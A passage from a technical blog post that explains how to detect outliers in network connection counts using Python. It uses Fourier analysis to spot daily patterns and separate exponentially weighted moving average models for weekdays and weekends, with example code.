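    treated as "similar enough" to keep the series intact.
    """
    return abs(ratio - 1.0) > tolerance

# Weekend traffic at 40% of the weekday level: model the two separately.
print(has_weekly_pattern(0.4))
# Weekend traffic within 5% of the weekday level: keep the series intact.
print(has_weekly_pattern(1.05))
```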

The next step is to determine if the time series displays daily patterns. In order to do this, I use numpy to take the Fourier transform of the time series and inspect the bins associated with a frequency of a day. I sum the three bins closest to that frequency and compare them to the first bin, the DC component. If the sum is large enough compared to that first bin, then the time series is classified as having a daily pattern.

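import numpy as np

def daily_ratio(tsdf):
  # Frequency resolution of the transform: 1 / (number of bins * bin width in seconds)
  nbins = len(tsdf)
  deltat = (tsdf.index[1] - tsdf.index[0]).seconds
  deltaf = 1.0 / (nbins * deltat)
  # Index of the bin closest to one cycle per day (round to avoid float truncation)
  daybin = int(round((1.0 / (24 * 3600)) / deltaf))

  # Compare the three bins around the daily frequency to the DC component (bin 0)
  rfft = np.abs(np.fft.rfft(tsdf["conns"]))
  return np.sum(rfft[daybin - 1:daybin + 2]) / rfft[0]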

Plots are sometimes the best way to explain these results, so I show two examples of the procedure below. In the first example, I show all the weekday data together in blue and the Fourier transform of that data in green. Red lines highlight the values corresponding to the frequency of a day in the Fourier transform data. The spike there is obvious and indicates a strong daily pattern.

The next figure shows the second example of the daily classification procedure. Here, the weekend data is combined in blue and the Fourier transform of that is in green. The Fourier transform data is flat and tells me that there is no daily pattern in this data.
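The same classification can be reproduced on synthetic data, which may help build intuition for the size of the ratio. The sketch below is self-contained and rests on assumptions: the one-week span, the 30-minute bins, and the signal shapes are invented for illustration. For a noiseless sine of amplitude 50 on a level of 100 spanning whole days, the ratio works out to 50 / (2 * 100) = 0.25, so the noisy version should land near that value while the flat series stays near zero.

```python
import numpy as np
import pandas as pd

def daily_ratio(conns):
    """Ratio of the spectrum near one cycle per day to the DC component."""
    nbins = len(conns)
    deltat = (conns.index[1] - conns.index[0]).total_seconds()
    deltaf = 1.0 / (nbins * deltat)
    daybin = int(round((1.0 / 86400.0) / deltaf))
    spectrum = np.abs(np.fft.rfft(conns.to_numpy()))
    return spectrum[daybin - 1:daybin + 2].sum() / spectrum[0]

# Synthetic data (assumed for illustration): one week of 30-minute bins.
rng = np.random.default_rng(0)
index = pd.date_range("2014-07-07", periods=7 * 48, freq="30min")
seconds = np.arange(len(index)) * 1800.0
noise = rng.normal(0.0, 5.0, len(index))

# One series with a daily cycle, one without.
daily = pd.Series(100 + 50 * np.sin(2 * np.pi * seconds / 86400) + noise, index=index)
flat = pd.Series(100 + noise, index=index)

daily_value = daily_ratio(daily)
flat_value = daily_ratio(flat)
print(daily_value, flat_value)
```

Any cutoff placed between the two printed values would separate these two cases; the cutoff used for real metrics is a tuning choice.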

The next step in the analysis is to apply a predictive model to the weekdays and weekends separately. In both cases, I apply an exponentially weighted moving average (EWMA). This calculation weights more recently occurring data more heavily in the calculation of an average. Trends and events in the past have less and less of an effect on future predictions. It’s a very simple calculation to do in pandas:

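import pandas as pd

def ewma_outlier(tsdf, stdlimit=5, span=15):
  # pd.ewma and pd.ewmstd have been removed from pandas; Series.ewm() is the current equivalent.
  # shift(1) makes each prediction depend only on earlier data.
  tsdf['conns_binpred'] = tsdf['conns'].ewm(span=span).mean().shift(1)
  tsdf['conns_binstd'] = tsdf['conns'].ewm(span=span).std().shift(1)
  tsdf['conns_stds'] = ((tsdf['conns'] - tsdf['conns_binpred']) /
                         tsdf['conns_binstd'])
  tsdf['conns_outlier'] = (tsdf['conns_stds'].abs() > stdlimit)
  return tsdf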
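To make the weighting concrete, the short sketch below computes an EWMA by hand and compares it with pandas. It assumes the pandas defaults: a span is converted to a smoothing factor alpha = 2 / (span + 1), and with adjust=True an observation i steps in the past gets a weight proportional to (1 - alpha) ** i. The helper name ewma_weights and the sample values are made up for the example.

```python
import numpy as np
import pandas as pd

def ewma_weights(n, span):
    """Normalized EWMA weights; index 0 is the most recent observation."""
    alpha = 2.0 / (span + 1.0)
    weights = (1.0 - alpha) ** np.arange(n)
    return weights / weights.sum()

values = pd.Series([10.0, 12.0, 11.0, 30.0, 12.0])
weights = ewma_weights(len(values), span=3)

# Reverse the data so the most recent value lines up with weight 0.
manual = float(np.dot(weights, values.to_numpy()[::-1]))
from_pandas = float(values.ewm(span=3).mean().iloc[-1])

print(weights)
print(manual, from_pandas)
```

The weights fall off geometrically, so a smaller span forgets old data faster and a larger span gives a smoother, slower-moving prediction.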

For time series that show no daily pattern, such as the weekend days of the example data we’ve been working with, I calculate the moving average and standard deviation and flag outliers when the actual data is a certain number of standard deviations away from the average. This procedure works best for data that does not vary significantly over time. It does not work as well when predictable daily patterns are present, because the moving average then lags the actual data in a predictable way that I should be able to account for. To account for that lag, I use a method I’ve been calling a “stacked EWMA”: I group the data by time of day and stack each day on top of another. The next scatter plot shows the data stacked in this way.

Each vertical line corresponds to the number of connection responses occurring during a certain time of day over the span of about three weeks. Now I track the EWMA of the data in each of those vertical lines separately. This is illustrated in the next plot.

Here, the connection responses between 8 AM and 8:30 AM are expanded over the range of days on which they were collected. The solid green line shows the EWMA calculated from just those points and the dashed green lines show the edges of the prediction window. The same analysis is carried out for each time of day bin. After it’s completed, I have a prediction window for each bin that’s based on what’s happened at this time of day over the previous days and weeks. Here is the code that completes this stacked analysis:

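import pandas as pd

def stacked_outlier(tsdf, stdlimit=4, span=10):
  # Track a separate EWMA for each time-of-day bin.
  # (pd.ewma and pd.ewmstd have been removed from pandas; Series.ewm() is the current equivalent.)
  gbdf = tsdf.groupby('timeofday')['conns']
  gbdf = pd.DataFrame({'conns_binpred': gbdf.transform(lambda s: s.ewm(span=span).mean()),
                       'conns_binstd': gbdf.transform(lambda s: s.ewm(span=span).std())})
  # Shift by one day's worth of bins so each prediction uses only previous days
  interval = tsdf.timeofday.iloc[1] - tsdf.timeofday.iloc[0]
  nshift = int(86400.0 / interval)
  gbdf = gbdf.shift(nshift)
  tsdf = gbdf.combine_first(tsdf)
  tsdf['conns_stds'] = ((tsdf['conns'] - tsdf['conns_binpred']) / tsdf['conns_binstd'])
  tsdf['conns_outlier'] = (tsdf['conns_stds'].abs() > stdlimit)
  return tsdf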

This last plot shows the final result when the weekday and weekend models are executed and combined in the same figure. Daily patterns are predicted and accounted for. Flat periods during the weekends are well tracked. In further testing, this prediction model has proven very robust across different types of time series.

In the future, I’d like to create some metric for judging different prediction models that adequately penalizes false positives and false negatives. I’d also like to experiment further with ARIMA (autoregressive integrated moving average) models and with automatically finding repeated patterns instead of counting on them occurring in daily and weekly time spans. Also, a different technique will probably be necessary for time series with low statistics.
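To see why stacking helps on data with a daily cycle, here is a small synthetic comparison of a plain EWMA prediction against a stacked one. Everything in it is an assumption for illustration: the two weeks of 30-minute bins, the sine-plus-noise signal, and the variable names are invented, and it uses the current Series.ewm() interface.

```python
import numpy as np
import pandas as pd

# Synthetic data (assumed): 14 days of 30-minute bins with a daily cycle.
rng = np.random.default_rng(42)
index = pd.date_range("2014-06-30", periods=14 * 48, freq="30min")
timeofday = np.asarray(index.hour * 3600 + index.minute * 60)
conns = (100 + 50 * np.sin(2 * np.pi * timeofday / 86400)
         + rng.normal(0.0, 2.0, len(index)))
tsdf = pd.DataFrame({"conns": conns, "timeofday": timeofday}, index=index)

# Plain EWMA: predict each bin from the bins immediately before it.
plain_pred = tsdf["conns"].ewm(span=15).mean().shift(1)

# Stacked EWMA: predict each bin from the same time of day on earlier days.
per_bin = tsdf.groupby("timeofday")["conns"]
stacked_pred = per_bin.transform(lambda s: s.ewm(span=10).mean()).shift(48)

# Compare mean absolute prediction error where both predictions exist.
valid = stacked_pred.notna() & plain_pred.notna()
plain_err = float((tsdf["conns"] - plain_pred)[valid].abs().mean())
stacked_err = float((tsdf["conns"] - stacked_pred)[valid].abs().mean())
print(plain_err, stacked_err)
```

On this kind of signal the plain EWMA trails the daily swing, so its error is dominated by lag, while the stacked prediction error stays close to the noise level.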

Thanks so much for reading. I hope you’ve learned a bit about the simplicity and power of working with the scientific computing stack in Python and its applications to network security data. I’ve posted the slides from which this material was taken here.

↧